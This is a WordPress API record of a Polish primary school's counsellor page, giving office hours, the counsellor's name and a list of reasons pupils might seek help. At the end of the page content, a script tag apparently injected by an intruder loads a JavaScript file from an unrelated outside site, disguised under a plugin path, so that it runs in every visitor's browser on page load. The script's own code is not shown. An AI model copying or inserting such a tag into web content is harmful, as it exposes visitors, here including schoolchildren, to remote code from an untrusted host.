{"id":62,"date":"2015-12-15T13:43:47","date_gmt":"2015-12-15T12:43:47","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=62"},"modified":"2020-10-02T07:57:53","modified_gmt":"2020-10-02T05:57:53","slug":"pedagog","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/pedagog\/","title":{"rendered":"Pedagog"},"content":{"rendered":"<p style=\"text-align: center;\"><strong>Godziny pracy pedagoga<\/strong><\/p>\n<ul>\n<li style=\"text-align: center;\"><strong>wtorek \u2013 8.00- 10.00<\/strong><\/li>\n<li style=\"text-align: center;\"><strong>\u015broda \u2013 13.40-14.30<\/strong><\/li>\n<li style=\"text-align: center;\"><strong>pi\u0105tek \u2013 12.30-13.40<\/strong><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>Pedagogiem szkolnym jest Pan Marcin Perzy\u0144ski.<\/p>\n<h3><span style=\"text-decoration: underline;\"><span style=\"color: #800120; text-decoration: underline;\">\u00a0<strong><strong>Zwr\u00f3\u0107 si\u0119 do pedagoga szkolnego, gdy:<\/strong><\/strong><\/span><\/span><\/h3>\n<ol>\n<li>Masz problemy z nauk\u0105.<\/li>\n<li>Nie radzisz sobie w kontaktach r\u00f3wie\u015bniczych.<\/li>\n<li>Jeste\u015b ofiar\u0105 agresji s\u0142ownej, fizycznej.<\/li>\n<li>Chcesz podzieli\u0107 si\u0119 swoj\u0105 rado\u015bci\u0105, sukcesem.<\/li>\n<li>Chcia\u0142by\u015b z kim\u015b porozmawia\u0107.<\/li>\n<li>Chcia\u0142by\u015b pom\u00f3c innym, nie wiesz w jaki spos\u00f3b.<\/li>\n<li>Masz ciekawe pomys\u0142y, kt\u00f3rymi chcesz si\u0119 podzieli\u0107.<\/li>\n<\/ol>\n<p><span style=\"color: #800150;\">\u00a0<strong>Przyjd\u017a tak\u017ce z ka\u017cd\u0105 spraw\u0105, z kt\u00f3r\u0105 sam nie potrafisz sobie poradzi\u0107.<\/strong><\/span><\/p>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/pedagog\/famille\/\" rel=\"attachment wp-att-3548\"><img loading=\"lazy\" class=\"aligncenter wp-image-3548\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/Famille-300x163.png\" alt=\"Famille\" width=\"478\" height=\"260\" srcset=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/Famille-300x163.png 300w, http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/Famille.png 650w\" sizes=\"(max-width: 478px) 100vw, 478px\" \/><\/a><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Godziny pracy pedagoga wtorek \u2013 8.00- 10.00 \u015broda \u2013 13.40-14.30 pi\u0105tek \u2013 12.30-13.40 &nbsp; Pedagogiem szkolnym jest Pan Marcin Perzy\u0144ski. \u00a0Zwr\u00f3\u0107 si\u0119 do pedagoga szkolnego, gdy: Masz problemy z nauk\u0105. Nie radzisz sobie w kontaktach r\u00f3wie\u015bniczych. Jeste\u015b ofiar\u0105 agresji s\u0142ownej, fizycznej. Chcesz podzieli\u0107 si\u0119 swoj\u0105 rado\u015bci\u0105, sukcesem. Chcia\u0142by\u015b z kim\u015b porozmawia\u0107. Chcia\u0142by\u015b pom\u00f3c innym, nie [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/62"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=62"}],"version-history":[{"count":16,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/62\/revisions"}],"predecessor-version":[{"id":15717,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/62\/revisions\/15717"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=62"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}